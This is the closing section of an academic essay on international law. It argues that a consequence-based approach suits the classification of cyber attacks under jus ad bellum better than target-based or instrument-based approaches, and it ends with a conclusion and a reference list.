II. Final Plea: Consequence-based vs. Target-based vs. Instrument-based

Table: The strong sides of each method

For the sake of breaking most of the stereotyped summaries, let us put the beloved "consequence-based" methodology in a defensive position in an imaginary witness box and then throw at it some accusations of 'incompetence' when compared to the other two proposals that adjust cyber warfare to the jus ad bellum.

Arguments in favour of target-based over consequence-based

The following statement sees a defect in the consequence-based mechanism when it has to deal with national infrastructures of critical importance:

Presumably, opponents generally criticize the consequence-based approach because it would be a useful tool only after the attack has really taken place. In addition, the unique character of cyber attacks predisposes decision-makers to react promptly to ongoing cyber attacks, and the consequence-based analysis would prove unreliable for dealing with these situations. As noted before, in order to evaluate the consequences, the victim should wait until it suffers real damage. Therefore, in situations of attack against critical national infrastructure many scholars advocate an immediate response, pointing out that it would be too risky to waste time assessing the magnitude of the attack while this vital critical national infrastructure is at stake (Sklerov, 2009).

Arguments in favour of instrument-based over consequence-based

While the instrument-based approach distinguishes itself by relative simplicity of application, and a significant body of state practice and cases has been amassed up to this moment, the situation with a probable promulgation of the consequence-based method may be unsatisfactory.
The main problem would perhaps be unclarity and lack of state practice, which eventually will lead, as Schmitt (1999) admits, to the occurrence of a grey area. On the other hand, resort to the instrument-based technique provides the interpreter with a standard with which it is easy to predict the nature of acts without impairing its internal coherence. The instrument-based approach allows for a more consistent application of the acts in concordance with the already existing normative structure. Thus, this would lead us to the conclusion that the international community would be more inclined to adopt this method while the legal scheme stays the same, mostly because this would avoid unwanted confusion and disputes (Schmitt, 1999).

Arguments in favour of consequence-based

To move smoothly on in the exchange of arguments, we ought to begin the consequence-based approach's plea by saying that it is not in question that the community did not seek to put a greater emphasis on consequences. Simply for practical reasons, at the moment of drafting the UN Charter, it was perhaps more reasonable for the states to adopt a method which was more widely accepted and known (Schmitt, 1999). Back then it was the logical choice, because conflicts waged with conventional, traditional weapons are simply identifiable. The instrument-based approach certainly gave a time-efficient result. Nevertheless, most scholars interested in studying cyber attacks and their significance in the arena of international law opine that, since cyber attacks have unique features that are not comprehensively covered by the legal mechanisms, another approach would bear better results than the obsolete instrument-based criteria (Hathaway et al., 2012). Jonathan A. Ophardt (2010) thinks that Michael Schmitt's true belief about the original intention of the drafters is that they wanted to regulate the consequences of an armed attack between states.
Instead, the drafters decided that a restriction on the means would be a more convenient approach, due to the legal normative standards they needed to take into consideration. Consequently, "the interpretive dilemma" (Schmitt, 2011, p. 573) arises from the fact that, in enacting a legal framework based on the instruments of force and coercion, the drafters also sought obliquely to restrict the consequences of these acts (Ophardt, 2010).

In support of this rationale comes the 1999 Assessment of International Legal Issues in Information Operations made by the U.S. Defense Department:

Right after this quote comes another one, which highlights the turning point in this line of thought:

Moreover, Schmitt argues that "scheme-imbuing consequences, rather than acts, with normative valence are nothing new" (Schmitt, 1999, p. 20). By way of example, here are several assertions that may analogously back up the supremacy of consequences over the acts themselves:

- The prohibitions in Protocol I to the Geneva Conventions on starvation of civilians, infliction of "widespread, long-term and severe damage" to the environment (Article 55(1) of Additional Protocol I), and attacks on facilities that "may cause the release of dangerous forces and consequent severe losses among the civilian population" (Article 56(1) of Additional Protocol I).
- The Environmental Modification Convention's ban on the utilization of any modified environmental tools and procedures for hostile purposes that may bring "widespread, long-lasting or severe effects" (1978, p. 7).
- The principle of proportionality (Article 56(5) of AP I), which seeks to balance the positive consequences, as military initiative, against the negative ones, as superfluous death/injury to individuals or destruction/damage to tangible objects.

Even if a particular approach is forbidden by a certain international provision, usually the norm that approves the act has a consequence-based character (Schmitt, 1999).
Apparently, the consequence-based declaratory style predominates in the jus in bello design as well (Schmitt, 1999). Knut Dörmann, in his paper "Applicability of the Additional Protocols to Cyber attacks" (2004), also centres his approach on the consequences, but he deems that an attack does not always have to bear violent consequences such as death or injury of civilians or soldiers, or destruction of or damage to tangible objects (Adler, 2011).

The consequence-based approach: the leading guideline

If we take into account all these arguments, it right away makes sense why the predominant view of most experts privy to international law and IT (2009) speaks in support of the consequence-based approach, defining it as "the best analytical model for dealing with cyber attacks" (Sklerov, 2009, p. 68). In sharp contrast, this method includes the cases which the instrument-based framework regulates and, on top of that, it includes attacks that are non-kinetic. The consequence-based approach is also better than the strict liability analysis, the other name of the target-based approach, because it does not violate international norms and customs (Sklerov, 2009). Admittedly, the current normative scheme cannot cope well with non-kinetic acts, and perhaps "a new normative architecture" is required to take these acts into account. Applying the consequence-based approach may put policy-makers in a position in which the existing law needs an interpretation, an extension beyond what it textually prescribes. Strictly speaking, that broad interpretation/extension beyond the current paradigm constitutes a new standard (Schmitt, 1999). Others find that the jus in bello is well enough established to adjust itself to new categories and means of warfare. The big problem with cyber attacks is that they do not exist in a specific environment: they can cause both physical (hardware) and non-material (software) damage (Brown, 2006).
Nevertheless, a point should be made that even though the current jus ad bellum and jus in bello do not regulate cyber attacks well, they can still serve as "a model for devising rules" (Brown, 2006, p. 183). With respect to that, "if the definition of a use of force is static, then the ban on the use of force gradually will become less effective as new interstate actions occur beyond the boundaries of what the drafters considered" (Bond, 1996, p. 29).

Conclusion

Although only a small number of interstate cyber attacks reach the high threshold, applying the existing jus ad bellum norms to those cases could apparently be very challenging. Again, fitting or adjusting these new forms of warfare necessitates a dose of interpretative skill mixed with a pinch of majestic improvisation and the talent to see the norms a bit outside their initial modus operandi. Many deem that not only do the current jus ad bellum rules fail to accomplish the assignment of classifying cyber attacks as an armed attack or a use/threat of force, but they also uncover major fractures in the legal system. The truth is that the process of fitting an act to the legal system is dictated by the fact that at the time of the drafting of the UN Charter there were no cyber attacks. Otherwise, the drafters would have created a norm regulating cyber attacks with which these acts could be categorized in terms of quantity and quality. Turning our sight again to the three approaches, we realize that the proposed set of techniques may serve the purpose of giving some interpretative solution that may work well under the current legal framework, so that the past and the future can converge and find a common language. Nevertheless, the definition of 'fitting' is "an action or act of one that fits" (Merriam-Webster dictionary), a meaning which expresses some activities inclined to bear a particular form of straining something which is cast in a different mould.
Ultimately, it seems vital, then, that in the most sublime moments of straining the breaking point is not gone beyond.

Reference List

Adler, H. (2011). Cyber Bellum? Retrieved from http://law.huji.ac.il/upload/AdlerHilaUpdated%281%29.pdf

Barkham, J. (2001). Information warfare and international law on the use of force. N.Y.U. J. Int'l L. & Pol., 34, 57.

Bond, J. N. (1996). Peacetime Foreign Data Manipulation as One Aspect of Offensive Information Warfare: Questions of Legality under the United Nations Charter Article 2(4). Retrieved from www.au.af.mil/au/awc/awcgate/navy/nwc_bond.pdf

Brown, D. (2006). A Proposal for an International Convention To Regulate the Use of Information Systems in Armed Conflict. Harv. Int'l L.J.

Dörmann, K. (2004). The applicability of the additional protocols to computer network attacks: an ICRC approach. In Bystrom, K. (Ed.), International Expert Conference on Computer Network Attacks and the Applicability of International Humanitarian Law: Proceedings of the Conference. Stockholm: National Defence College.

Environmental Modification Convention (1978). Retrieved from Environmental Modification Convention

Hathaway, O., Crootof, R., Levitz, P., Nix, H., Nowlan, A., Perdue, W., & Spiegel, J. (2012). California Law Review, 100(4), 817-886.

ICRC (1977). Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of International Armed Conflicts (Protocol I).

Ophardt, J. A. (2010). Cyber Warfare and the Crime of Aggression: The Need for Individual Accountability on Tomorrow's Battlefield. Duke L. & Tech. Rev., 003.

Schmitt, M. (1999). Computer network attack and the use of force in international law. Columbia Journal of Transnational Law, 37, 885-937.

Schmitt, M. (2011). Cyber operations and the jus ad bellum revisited. Villanova Law Review, 56, 569-606.

Sklerov, M. (2009). Solving the dilemma of state responses to cyberattacks: A justification for the use of active defences against states who neglect their duty to prevent. (Master's thesis, The Judge Advocate General's School, USA).

Stevens (2009). Internet War Crimes Tribunals and Security in an Interconnected World. Retrieved on 02/07/2013 from http://www.uiowa.edu/~tlcp/TLCP%20Articles/18-3/stevens.finalfinal.me.mlb.100109.pdf

United Nations (1945). United Nations Charter. Retrieved from Charter of the United Nations

U.S. Defense Department (1999). An assessment of international legal issues in information operations. Retrieved on 02/07/2013 from http://www.au.af.mil/au/awc/awcgate/dod-io-legal/dod-io-legal.pdf

Waxman, M. (2013). Self-Defensive Force Against Cyber Attacks: Legal, Strategic and Political Dimensions. Retrieved on 02/07/2013 from SSRN.

Source: Resources.InfosecInstitute.COM